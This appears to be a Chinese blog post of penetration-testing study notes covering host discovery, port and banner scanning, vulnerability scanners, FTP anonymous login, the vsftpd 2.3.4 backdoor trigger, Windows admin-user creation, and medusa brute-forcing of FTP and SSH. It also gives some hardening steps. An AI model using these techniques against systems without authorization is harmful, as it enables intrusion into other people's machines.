<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="m0re"><meta name="copyright" content="m0re"><meta name="generator" content="Hexo 5.1.0"><meta name="theme" content="hexo-theme-yun"><title>漏洞扫描 | m0re的小站</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="none" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.19/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_stqaphw3j4.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.css"><script defer src="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/contrib/copy-tex.min.css"><script defer src="https://cdn.jsdelivr.net/npm/katex@latest/dist/contrib/copy-tex.min.js"></script><script defer src="https://cdn.jsdelivr.net/npm/katex@latest/dist/contrib/auto-render.min.js"></script><script>document.addEventListener("DOMContentLoaded", function() {
  renderMathInElement(document.body, {
    delimiters: [
      {left: "$$", right: "$$", display: true},
      {left: "$", right: "$", display: false},
      {left: "\\(", right: "\\)", display: false},
      {left: "\\[", right: "\\]", display: true}
    ]
  });
});</script><link rel="shortcut icon" type="image/svg+xml" href="/yun.svg"><link rel="mask-icon" href="/yun.svg" color="#0078E7"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"root":"/","title":"人生路漫漫","version":"0.9.7","anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"local_search":{"path":"/search.xml"},"fireworks":{"colors":["102, 167, 221","62, 131, 225","33, 78, 194"]}};
  </script><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><meta name="description" content="主机发现二层主机发现定义：利用OSI中链路层中的协议进行主机发现。一般使用ARP协议。优点：(局域网中通信使用ARP协议，利用MAC地址作为对应的识别地址)1.速度快2.可靠性高缺点：无法扫描经过路由的主机二层发现-arping工具(kali自带)arping --help扫描，使用命令arping 192.168.0.1扫描一次    arping  -c 1 192.168.0.1可限定扫描次">
<meta property="og:type" content="article">
<meta property="og:title" content="漏洞扫描">
<meta property="og:url" content="https://zxcv0221.github.io/2020/07/30/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F/index.html">
<meta property="og:site_name" content="m0re的小站">
<meta property="og:description" content="主机发现二层主机发现定义：利用OSI中链路层中的协议进行主机发现。一般使用ARP协议。优点：(局域网中通信使用ARP协议，利用MAC地址作为对应的识别地址)1.速度快2.可靠性高缺点：无法扫描经过路由的主机二层发现-arping工具(kali自带)arping --help扫描，使用命令arping 192.168.0.1扫描一次    arping  -c 1 192.168.0.1可限定扫描次">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528173206115.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528173218883.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528173236194.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528173300230.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528173319817.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528173339201.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020052817343391.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528173519188.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528173546383.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528173556123.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528173602570.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528173609158.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020052817362028.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528174254534.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528174322400.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200528174359487.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="article:published_time" content="2020-07-30T13:12:21.000Z">
<meta property="article:modified_time" content="2020-07-30T01:15:58.331Z">
<meta property="article:author" content="m0re">
<meta property="article:tag" content="encryptAsDiary">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20200528173206115.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70"><script src="/js/ui/mode.js"></script></head><body><script defer src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="m0re"><img width="96" loading="lazy" src="/img/avatar.jpg" alt="m0re"></a><div class="site-author-name"><a href="/about/">m0re</a></div><a class="site-name" href="/about/site.html">m0re的小站</a><sub class="site-subtitle"></sub><div class="site-desciption"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">65</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">0</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">21</span></a></div><a class="site-state-item hty-icon-button" href="/custom/" title="文档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/zxcv0221" title="GitHub" target="_blank" style="color:#6e5494"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://blog.csdn.net/qq_45836474" title="CSDN" target="_blank" style="color:#E6162D"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-telegram-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://www.cnblogs.com/Augenstern-blog/" title="博客园" target="_blank" style="color:#007722"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://twitter.com/ISm0r3" title="Twitter" target="_blank" style="color:#1da1f2"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-twitter-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:wfulaj4y@gmail.com" title="E-Mail" target="_blank" style="color:#8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-genderless-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="toc-number">1.</span> <span class="toc-text">主机发现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E5%B1%82%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="toc-number">1.1.</span> <span class="toc-text">二层主机发现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E5%B1%82%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="toc-number">1.2.</span> <span class="toc-text">三层主机发现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%E5%B1%82%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="toc-number">1.3.</span> <span class="toc-text">四层主机发现</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">2.</span> <span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F"><span class="toc-number">3.</span> <span class="toc-text">漏洞扫描</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81FTP%E5%8D%8F%E8%AE%AE%E4%BB%8B%E7%BB%8D"><span class="toc-number">4.1.</span> <span class="toc-text">一、FTP协议介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81FTP%E4%B8%8D%E5%8F%AF%E9%81%BF%E5%85%8D%E7%9A%84%E9%97%AE%E9%A2%98"><span class="toc-number">4.2.</span> <span class="toc-text">二、FTP不可避免的问题</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ubuntu%E6%90%AD%E5%BB%BAssh%E6%9C%8D%E5%8A%A1%E7%AB%AF"><span class="toc-number">4.3.</span> <span class="toc-text">Ubuntu搭建ssh服务端</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Telnet%E6%9C%8D%E5%8A%A1%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">4.4.</span> <span class="toc-text">Telnet服务漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#telnet%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3"><span class="toc-number">4.4.1.</span> <span class="toc-text">telnet密码破解</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#smtp%E6%9C%8D%E5%8A%A1%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.5.</span> <span class="toc-text">smtp服务漏洞</span></a></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://zxcv0221.github.io/2020/07/30/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="m0re"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="m0re的小站"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">漏洞扫描</h1><div class="post-meta"><div class="post-time" style="display:inline-block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <time title="创建时间：2020-07-30 21:12:21" itemprop="dateCreated datePublished" datetime="2020-07-30T21:12:21+08:00">2020-07-30</time></div><span class="leancloud_visitors" id="/2020/07/30/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F/" data-flag-title="漏洞扫描"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span class="leancloud-visitors-count"></span></span></span><div class="post-classify"><span class="post-tag"><a class="tag" href="/tags/encryptAsDiary/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">encryptAsDiary</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#0078E7;"><h1 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h1><h2 id="二层主机发现"><a href="#二层主机发现" class="headerlink" title="二层主机发现"></a>二层主机发现</h2><p>定义：利用OSI中链路层中的协议进行主机发现。一般使用ARP协议。<br>优点：(局域网中通信使用ARP协议，利用MAC地址作为对应的识别地址)<br>1.速度快<br>2.可靠性高<br>缺点：<br>无法扫描经过路由的主机<br>二层发现-arping工具<br>(kali自带)<br><code>arping --help</code><br>扫描，使用命令<br><code>arping 192.168.0.1</code><br>扫描一次    <code>arping  -c 1 192.168.0.1</code><br>可限定扫描次数<br>二层扫描工具-netdiscover工具<br>kali自带netdiscover可以针对特定子网进行多主机扫描。<br>查看帮助信息   <code>netdiscover -h</code><br>可直接netdiscover回车进行自动化扫描<br>对当前IP扫描<br><code>discover -r 192.168.1.1/24(IP可自定义)</code></p>
<h2 id="三层主机发现"><a href="#三层主机发现" class="headerlink" title="三层主机发现"></a>三层主机发现</h2><p>定义：利用OSI中网络中的协议进行主机发现。一般使用ICMP协议。<br>优点：<br>1.可以发现远程主机，经过路由的主机(弥补二层发现的缺点)<br>2.速度相对比较快<br>缺点：<br>1.经常被防火墙过滤<br>2.速度相比二层发现慢<br>三层发现-ping工具<br>ping工具在kali和linux中都有自带，linux下ping如果不指定<code>-c</code>参数，会一直扫描。windows系统下，默认进行<strong>四次探测</strong>。<br>如果关闭防火墙，那么ping就不能够ping的通了。<br>三层发现工具-fping工具<br>kali自带的fping可以进行对应的三层主机发现，可以针对多个主机同时进行主机发现。<br><code>fping -g 192.168.1.0/24</code><br>可以扫描在子网段的主机存活状态。<br>hping3工具（kali自带）<br>对目标进行三层主机发现，特点：发送自定义ICMP数据包<br><code>hping3 -c 2 --icmp 192.168.1.1</code><br>或者：<code>hping3 -c 3 -1 192.168.1.1</code></p>
<h2 id="四层主机发现"><a href="#四层主机发现" class="headerlink" title="四层主机发现"></a>四层主机发现</h2><p>四层发现指利用OSI中的传输层协议进行主机发现，一般使用TCP、UDP探测<br>优点：<br>1.可以探测远程主机<br>2.比三层发现更为可靠<br>缺点<br>花费时间更长<br>工具nmap<br>(kali自带)<br>nmap IP地址、<br>hping3工具也可以进行四层发现<br>命令使用：<br><code>hping3 --udp -c -3  -p IP地址</code><br>python脚本<br>（暂时用不到，用到的话找百度找一下）</p>
<h1 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h1><ol>
<li>nmap扫描<br>nmap IP地址<br>功能强大</li>
<li>Dmitry工具<br>kali自带<br>简单使用：dmitry -p IP地址<br>扫描的端口没有nmap多</li>
<li>netcat工具<br>简单使用命令：<br><code>nc -nvz IP地址 端口范围</code><br>如：<code>nc -nvz 192.168.40.138 1-5000</code></li>
</ol>
<p>端口Banner获取<br>nmap获取<br>简单命令使用：<br><code>nmap [ip] -p [指定端口] --script banner</code><br>如：<code>nmap 192.168.1.105 -p 22 --script banner</code><br>还可以范围扫描<br>比如：<code>nmap [ip] --script banner -p 20-30</code><br>dmitry获取端口banner信息</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dmitry <span class="literal">-pb</span> [<span class="type">ip</span>]</span><br><span class="line">dmitry <span class="literal">-pb</span> <span class="number">192.168</span>.<span class="number">1.105</span></span><br></pre></td></tr></table></figure>

<p>netcat获取banner信息<br>简单命令：<br><code>nc -vn [ip] [port]</code></p>
<p>端口服务版本信息获取<br>利用nmap获取目标系统的端口版本信息<br>nmap -p [port] -sV [ip]<br>获取操作系统版本信息<br>使用nmap进行探测<br>简单命令：<br><code>nmap -O [ip]</code><br>如：<code>nmap -O 192.168.10.105</code><br>一条命令测全部信息(需要在授权的情况下)<br>进行完整测试<br><code>nmap -A -v [ip]</code></p>
<h1 id="漏洞扫描"><a href="#漏洞扫描" class="headerlink" title="漏洞扫描"></a>漏洞扫描</h1><p>nmap进行扫描<br><code>nmap --script vuln [ip]</code><br>nessus扫描漏洞</p>
<p>web漏洞扫描器<br>1、Owasp-zap<br>2、AWVS<br>3、Appscan<br>4、Nikto<br>5、Burpsuite<br>每个扫描器都有各自不同的payload进行探测<br>Owasp-zap漏洞扫描<br>nikto扫描<br>kali自带<br>使用：    <code>nikto -host [ip]</code><br>进行漏洞扫描<br>扫描到SQL注入漏洞后，可以使用sqlmap进行注入 漏洞利用</p>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><h2 id="一、FTP协议介绍"><a href="#一、FTP协议介绍" class="headerlink" title="一、FTP协议介绍"></a>一、FTP协议介绍</h2><p>文件传输协议，是用于在网络上进行文件传输的一套标准协议，使用客户/服务器模式，它属于网络传输协议的应用层。FTP使用的是21号端口。<br>FTP将用户分为三类：<br>1、Real用户<br>2、Administrator  超级用户可以进行任何操作<br>3、匿名用户   （可能出现漏洞的地方）<br>FTP文件传输格式：<br>1、ascii<br>2、二进制格式<br>利用FTP匿名登录漏洞<br>由于FTP没有禁止匿名用户，所以可以直接使用Anonymous用户直接登录FTP服务器。<br>使用nc连接FTP<br>匿名登录FTP服务器</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">nc [ip] [port]</span><br><span class="line">输入USER anonymous</span><br><span class="line">输入PASS [mima]（可以为空）</span><br><span class="line">输入<span class="built_in">help</span>查看可以执行的命令</span><br></pre></td></tr></table></figure>

<p>先使用nmap进行扫描，查看目标IP的21号端口是否开放<br><code>nmap -p 21 192.168.1.106</code><br>如果开放，那么可以扫描查看是否存在漏洞<br><code>nmap --script vuln -p 21 192.168.1.106</code><br>如果存在匿名登录漏洞，那么就可以进行登录<br>PWD查看当前工作的目录<br>QUIT退出登录<br>不想使用命令行，网上有连接FTP的软件，可以找一下。<br>利用FTP后门漏洞<br>vsftpd手工触发漏洞：当进行FTP认证时，如果用户名USER中包含:)，那么直接就触发监听6200端口的连接shell。<br>比如nc连接时输入用户名，格式写成这样： <code>USER user:)</code><br>就可以自动触发6200监听端口，可以使用nc连接6200端口。<br>FTP安全配置<br>关闭匿名登陆权限，修改配置文件。<br>对特定漏洞进行打补丁<br>比如说2.3.4的版本有后门，那么我们换3.0.0版本就行。<br>或者设置防火墙禁止连接后门端口。<br>使用命令：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">iptables <span class="literal">-A</span> INPUT <span class="literal">-p</span> tcp <span class="literal">-dport</span> <span class="number">6200</span> <span class="literal">-j</span> DROP</span><br><span class="line">iptables <span class="literal">-A</span> OUTPUT <span class="literal">-p</span> tcp <span class="literal">-sport</span> <span class="number">6200</span> <span class="literal">-j</span> DROP</span><br></pre></td></tr></table></figure>

<p>一条输入，一条输出。这样阻断外界与6200端口的连接。</p>
<h2 id="二、FTP不可避免的问题"><a href="#二、FTP不可避免的问题" class="headerlink" title="二、FTP不可避免的问题"></a>二、FTP不可避免的问题</h2><p>FTP用户名密码暴力破解<br>windows下cmd命令添加用户，以及提升Administrator管理员权限</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net user [用户名] [用户密码] /add</span><br><span class="line">net localgroup administrators [用户名] /add</span><br></pre></td></tr></table></figure>

<p>使用medusa暴力破解FTP登录<br>kali自带工具</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">medusa -h [ip] -u [用户名] -P [密码字典文件路径] -M ftp   暴力批量破解</span><br><span class="line">medusa -h [ip] -u [用户名] -p [密码] -M ftp      暴力单个密码破解</span><br></pre></td></tr></table></figure>
<h2 id="Ubuntu搭建ssh服务端"><a href="#Ubuntu搭建ssh服务端" class="headerlink" title="Ubuntu搭建ssh服务端"></a>Ubuntu搭建ssh服务端</h2><p><code>sudo apt-get install openssh-server</code><br>ssh服务端的启动和关闭<br>启动：<code>service ssh start</code><br>状态获取：<code>service ssh status</code><br>关闭：<code>service ssh stop</code><br>Ubuntu搭建ssh客户端<br>首先安装putty工具<br><code>sudo apt-get install putty-tools</code><br>然后在软件中心搜索putty安装。<br><img src="https://img-blog.csdnimg.cn/20200528173206115.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>安装完毕后，打开<br>输入本机的IP地址，其他的默认就行。<br><img src="https://img-blog.csdnimg.cn/20200528173218883.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>然后连接(前提是ssh是开启状态)open<br>连接后，输入用户名和密码，就连接成功了。进行一系列的操作哦。<br>ssh banner信息获取</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nmap获取ssh Banner信息</span><br><span class="line">nmap -sV -p 22 [ip]</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200528173236194.png" alt="j4y" loading="lazy"><br>msfconsole<br><img src="https://img-blog.csdnimg.cn/20200528173300230.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>鸭子哈哈。<br><img src="https://img-blog.csdnimg.cn/20200528173319817.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>按照操作步骤，进行就能得到banner信息</p>
<p>使用nc也行，<br><img src="https://img-blog.csdnimg.cn/20200528173339201.png" alt="j4y" loading="lazy"><br>简单，查询迅速。<br>配置ssh规避banner信息<br>在ssh配置文件sshd_config中新增一行。<br>进入到/etc/ssh路径下，输入</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sudo gedit </span><br><span class="line">sshd_config</span><br><span class="line">ctrl+F搜索banner</span><br><span class="line">加一句DebianBanner no 再次扫描发现没有操作系统信息。</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/2020052817343391.png" alt="j4y" loading="lazy"><br>没有banner信息了。<br>ssh弱口令破解利用<br>Medusa SSH弱口令破解<br>如果在设置ssh服务时，管理员设置了容易被猜解出来的用户名和密码（弱口令）。那么测试人员就可以使用对应的密码工具进行暴力破解弱口令。破解出来就可以使用对应的用户名和密码登录系统。<br>单个密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">medusa -h [ip] -u [用户名] -p [密码] -M ssh</span><br><span class="line">批量破解，有字典</span><br><span class="line">medusa -h [ip] -u [用户名] -P [密码] -M ssh</span><br><span class="line">尝试破解qwzf密码，失败哈哈。没有字典。</span><br></pre></td></tr></table></figure>
<p>ssh命令行工具登录<br>一般情况下linux下都具有ssh客户端，用来登录ssh服务端<br><code>可以使用ssh 用户名@IP地址  然后根据提示输入密码。</code><br><img src="https://img-blog.csdnimg.cn/20200528173519188.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>可以进行在命令行(终端)的操作<br>输入exit退出连接(登出)</p>
